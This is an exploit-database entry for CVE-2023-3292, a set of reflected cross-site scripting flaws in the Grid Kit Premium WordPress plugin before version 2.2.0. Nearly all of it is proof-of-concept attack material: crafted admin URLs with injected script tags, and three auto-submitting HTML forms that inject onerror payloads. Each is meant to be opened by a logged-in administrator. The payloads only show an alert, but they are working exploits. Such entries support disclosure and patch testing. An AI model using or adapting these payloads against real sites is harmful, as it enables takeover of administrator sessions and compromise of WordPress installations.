Exploit for Grid Kit Premium < 2.2.0 - Multiple Reflected Cross-Site Scripting CVE-2023-3292

Name: Exploit for Grid Kit Premium < 2.2.0 - Multiple Reflected Cross-Site Scripting CVE-2023-3292
Rating: 5 (107 reviews)

2023-07-10 | CVSS 6.4

## https://sploitus.com/exploit?id=WPEX-ID:D993C385-C3AD-49A6-B079-3A1B090864C8
Make a logged in admin open one of the URL below

https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews&a"><script>alert(/XSS/)</script>
https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries&"><script>alert(/XSS/)</script>


Make a logged in admin open a page containing the HTML code below

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews" method="POST">
        <input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
        <input type="submit" value="submit">
    </form>
</body>

<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries" method="POST">
        <input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
        <input type="submit" value="submit">
    </form>
</body>

Requires at least one gallery to be present
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=grid-kit" method="POST">
        <input type="text" name="page" value='"><img src onerror=alert(/XSS/)>'>
        <input type="submit" value="submit">
    </form>
</body>

Other vulnerable URL (when at least one item in the table):
- https://example.com/wp-admin/admin.php?page=grid-kit-product-enquiries
- https://example.com/wp-admin/admin.php?page=grid-kit-product-reviews